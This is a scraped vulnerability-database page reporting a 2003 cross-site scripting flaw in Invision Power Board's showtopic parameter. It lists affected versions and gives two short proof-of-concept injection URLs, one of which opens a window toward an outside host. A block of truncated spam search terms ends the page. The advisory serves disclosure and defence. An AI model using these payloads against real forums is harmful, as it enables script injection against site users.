exploits , vulnerabilities , articles , Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability

Title	Invision Power Board Index.php Showtopic Cross-Site Scripting Vulnerability
Published	2003-09-09-12:00AM
Updated	2004-03-01-03:46PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	The disclosure of this issue has been credited to Boy Bear <eyal067@walla.co.il>.
Vulnerable	Invision Power Services Invision Board 1.3 Final Invision Power Services Invision Board 1.3 Invision Power Services Invision Board 1.2 Invision Power Services Invision Board 1.1.2 Invision Power Services Invision Board 1.1.1 Invision Power Services Invision Board 1.0.1 Invision Power Services Invision Board 1.0
Not Vulnerable
Code	The following proof of concept was provided: http://www.example.com/index.php?showtopic='><script>window.open (window.location.search.substring(79)) </script>http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision http://www.example.com/?showtopic='><script>alert(window.document.url)</script><plaintext>
TXT

Vulnerabilities - newest 10 RSS | More

2009-11-06 Google Chrome prior to 3.0.195.32 Multiple Security Vulnerabilities
2009-11-05 Asterisk SIP Response Username Enumeration Remote Information Disclosure Vulnerability
2009-11-05 Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability
2009-11-05 Linux Kernel r128 Driver CCE Initialization NULL Pointer Dereference Denial of Service Vulnerability
2009-11-05 Prototype JavaScript Framework Cross-Site Ajax Request Vulnerability
2009-11-05 Drupal Organic Groups Vocabulary Group Title HTML Injection Vulnerability
2009-11-05 IBM PowerHA Cluster Management Unauthorized Access Vulnerability
2009-11-05 HP Power Manager Unspecified Remote Code Execution Vulnerability
2009-11-05 Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability
2009-11-04 Roundcube Webmail index.PHP Cross-Site Scripting Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 03:45:44 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
PacketShap PHPWind news for c www.mnjyw. phpBB 1.0. trisha bed 200 /compo cooree.cn www.ke2000 news for C www.bianbi www.szhycw www.51ydx. 2.4.18-20 Women havi www3pic.co Uploaderv6 NAMITHA SE Mobile 9 g iiculowacy microsoft Bluefilm.c CMS is Fre 200 /compo 124 www.quheit celebrety+ free sexy Crack Data 200 /compo php-nuke 2 www.myppxx yutube vid www.youtub sexy tamil Bluefilm.c mambo Remo Actress br free sexy www.youtub www.4ero.n Thrisha se www.nvxie5 WWW.HINDI Xxxxlsex arabic por blue filim CMS is Fre Www worlds www.zpl888